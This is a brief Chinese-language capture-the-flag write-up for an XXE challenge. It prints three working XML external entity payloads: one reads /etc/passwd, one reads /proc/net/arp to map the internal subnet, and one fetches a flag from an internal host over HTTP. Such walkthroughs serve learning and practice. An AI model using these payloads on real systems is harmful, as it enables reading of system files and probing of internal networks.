还是比较简单的题目。
- 根据题目和抓包可以知道存在xxe漏洞。我们第一次post传入:2. 我们看到有回显,但是参试寻找flag文件无果。
1
2
3
4
5<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///etc/passwd">]
>
<user><username>&name;</username><password>1</password></user> - 我通过读取
/etc/hosts和/proc/net/arp得到C段的ip。1
2
3
4
5<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "file:///proc/net/arp" >]
>
<user><username>&name;</username><password>1</password></user> - 我们直接使用http协议进行访问得到flag,其实c段需要我们猜直接爆破。
1
2
3
4
5<?xml version="1.0" ?>
<!DOCTYPE a[
<!ENTITY name SYSTEM "http://173.28.179.11" >]
>
<user><username>&name;</username><password>1</password></user>
这里主要还是学习/proc/net/arp和/etc/hosts那个文件夹。